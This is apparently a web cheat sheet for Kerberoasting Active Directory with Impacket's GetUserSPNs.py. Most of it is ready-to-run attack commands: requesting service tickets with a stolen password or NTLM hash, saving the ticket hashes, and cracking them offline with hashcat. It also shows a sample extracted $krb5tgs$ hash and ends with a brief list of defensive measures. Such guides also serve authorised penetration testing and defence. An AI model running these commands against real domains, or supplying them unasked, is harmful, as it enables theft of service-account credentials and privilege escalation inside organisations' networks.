Press ESC to close

Impacket Kerberoasting Cheat Sheet


What is Kerberoasting?

Kerberoasting is an attack where an adversary requests service tickets for Service Principal Names (SPNs) from a Domain Controller, extracts these tickets, and attempts to crack their associated passwords offline.


Pre-requisites

Before running a Kerberoasting attack using Impacket, ensure the following:

  • You have a valid domain user account (low-privilege).
  • Impacket is installed on your system.

Install Impacket:

You can install Impacket using pip:

pip install impacket

Or clone the repository:

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .

Kerberoasting Using Impacket

Impacket provides several tools, including GetUserSPNs.py, which can be used for Kerberoasting attacks.

Basic Command:

python3 GetUserSPNs.py <domain>/<username>:<password> -request
  • : The Active Directory domain (e.g., contoso.local).
  • : The domain user’s username.
  • : The password for the domain user.

This will request service tickets (TGS) for accounts with SPNs and output the extracted Kerberos tickets in a hash format that can be cracked.


Command Breakdown

Retrieve SPNs with TGS Tickets:

python3 GetUserSPNs.py <domain>/<username>:<password> -request
  • This command will query for user accounts with associated SPNs and request a service ticket (TGS) for each.
  • The TGS tickets are displayed in a format suitable for cracking (e.g., using hashcat).

Example Usage:

python3 GetUserSPNs.py contoso.local/ryan:Password123 -dc-ip 10.0.0.1 -request
  • -dc-ip: Optional argument to specify the IP of the Domain Controller (if needed).

Specifying Hash Instead of Password:

If you have the NTLM hash of the domain user instead of their password, you can use it like so:

python3 GetUserSPNs.py <domain>/<username> -hashes <LMHASH>:<NTHASH> -request
  • :: The LM and NT hashes of the user’s password (e.g., aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee).

Example (with hash):

python3 GetUserSPNs.py contoso.local/ryan -hashes :aad3b435b51404eeaad3b435b51404ee -request

Saving Output to a File

You can redirect the output to a file for later use with a cracking tool like hashcat:

python3 GetUserSPNs.py <domain>/<username>:<password> -request > kerberoast_hashes.txt

Cracking Kerberos Tickets with Hashcat

Once you’ve obtained the service ticket hashes, the next step is to crack them offline using a tool like hashcat.

Example Command with Hashcat:

hashcat -m 13100 kerberoast_hashes.txt /path/to/wordlist.txt
  • -m 13100: This specifies the hash type for Kerberos 5 TGS-REP (the format used in Kerberoasting).
  • kerberoast_hashes.txt: The file containing the TGS hashes extracted from the Impacket Kerberoasting.
  • /path/to/wordlist.txt: The wordlist to use for password cracking.

Example Output from Impacket:

$krb5tgs$23$*sqlservice$CONTOSO.LOCAL$contoso.local/sqlservice:88$0c593bb6db76f8a4bf39c7da99173b50$3be75864f120763769f571b13b0379e7bb3c49fa0ef0d6f3f7d4fcf300f519364a5aa23038096adfbecdb929c42124f37f0834656883a7cd02f26ac5c8b243c7bc72b58904c3467d9f640da799c026a6

This can be fed directly into hashcat to begin password cracking.


Advanced Options

Specify Kerberos Realm:

If you’re working in a multi-domain environment or need to specify a particular realm:

python3 GetUserSPNs.py <domain>/<username>:<password> -request -k -no-pass -target-domain <target-domain>
  • -target-domain: Specify the target domain for the attack.
  • -k: Use Kerberos authentication instead of NTLM.
  • -no-pass: Run the query without supplying a password.

Using Kerberos Tickets (.kirbi files):

If you already have a Kerberos ticket-granting ticket (TGT), you can use it to request service tickets (TGS):

python3 GetUserSPNs.py -k -no-pass -target-domain <target-domain> -request

This command allows the attacker to continue their Kerberoasting attempts using a valid Kerberos TGT.


Defensive Measures

To protect against Kerberoasting, organizations can:

  • Enforce strong, complex passwords for service accounts.
  • Limit which accounts are allowed to have SPNs.
  • Regularly rotate service account passwords.
  • Monitor and restrict the number of TGS requests for service accounts.

Leave a Reply

Your email address will not be published. Required fields are marked *